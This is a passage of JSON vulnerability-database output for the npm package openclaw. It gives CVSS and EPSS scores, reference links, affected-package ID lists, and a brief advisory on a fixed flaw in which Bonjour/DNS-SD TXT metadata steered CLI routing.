reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41337","reference_id":"","reference_type":"","scores":[{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11472","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11506","published_at":"2026-06-06T12:55:00Z"},{"value":"0.00037","scoring_system":"epss","scoring_elements":"0.11508","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41337"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:28:16Z/"}],"url":"https://github.com/openclaw/openclaw/commit/efe9183f9d2fd5e01c8068fa01f4a07a58a63c0b"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/
AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-89r3-6x4j-v7wf","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-24T14:28:16Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-89r3-6x4j-v7wf"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41337","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41337"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-callback-origin-mutation-in-plivo-voice-call-replay","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:
A/M:M/D:T/2026-04-24T14:28:16Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-callback-origin-mutation-in-plivo-voice-call-replay"},{"reference_url":"https://github.com/advisories/GHSA-89r3-6x4j-v7wf","reference_id":"GHSA-89r3-6x4j-v7wf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-89r3-6x4j-v7wf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulne
rability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulne
rability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41337","GHSA-89r3-6x4j-v7wf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s3wz-3yzf-ybhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91442?format=json","vulnerability_id":"VCID-s4s8-8qea-q3fd","summary":"OpenClaw: Bonjour/DNS-SD TXT metadata steers CLI routing after failed service resolution\n## Summary\nBonjour and DNS-SD TXT metadata could still steer CLI routing even when actual service resolution failed, allowing unresolved hints to influence the chosen target.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Affected: < 2026.3.22\n- Fixed: >= 2026.3.22\n- Latest released tag checked: `v2026.3.23-2` (`630f1479c44f78484dfa21bb407cbe6f171dac87`)\n- Latest published npm version checked: `2026.3.23-2`\n\n## Fix Commit(s)\n- `deecf68b59a9b7eea978e40fd3c2fe543087b569`\n\n## Release Status\nThe fix shipped in `v2026.3.22` and remains present in `v2026.3.23` and `v2026.3.23-2`.\n\n## Code-Level Confirmation\n- src/infra/bonjour-discovery.ts now resolves and returns only concrete endpoints instead of falling back to unresolved TXT host and port hints.\n- src/cli/gateway-cli/discover.ts consumes only the fail-closed resolved endpoint path.\n\nOpenClaw thanks @nexrin for 
reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35659","reference_id":"","reference_type":"","scores":[{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00688","published_at":"2026-06-06T12:55:00Z"},{"value":"7e-05","scoring_system":"epss","scoring_elements":"0.00687","published_at":"2026-06-07T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35659"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"}],"url":"https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"},{"reference_url":"https://github.com/openclaw/openclaw/commit/deecf68b59a9b7eea978e40fd3c2fe543087b569","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_syste
m":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"}],"url":"https://github.com/openclaw/openclaw/commit/deecf68b59a9b7eea978e40fd3c2fe543087b569"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rvqr-hrcc-j9vv","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-rvqr-hrcc-j9vv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35659","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35659"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-unresolved-service-metadata-routing-via-bonjour-and-dns-sd-discovery","reference_id":"","reference_type":"","scores":[{"value":"4.6","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"},{"value":"5.1","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track"
,"scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-10T16:58:41Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-unresolved-service-metadata-routing-via-bonjour-and-dns-sd-discovery"},{"reference_url":"https://github.com/advisories/GHSA-rvqr-hrcc-j9vv","reference_id":"GHSA-rvqr-hrcc-j9vv","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-rvqr-hrcc-j9vv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109983?format=json","purl":"pkg:npm/openclaw@2026.3.22","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},
{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},
{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},
{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},
{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.22"}],"aliases":["CVE-2026-35659","GHSA-rvqr-hrcc-j9vv"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-s4s8-8qea-q3fd"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/90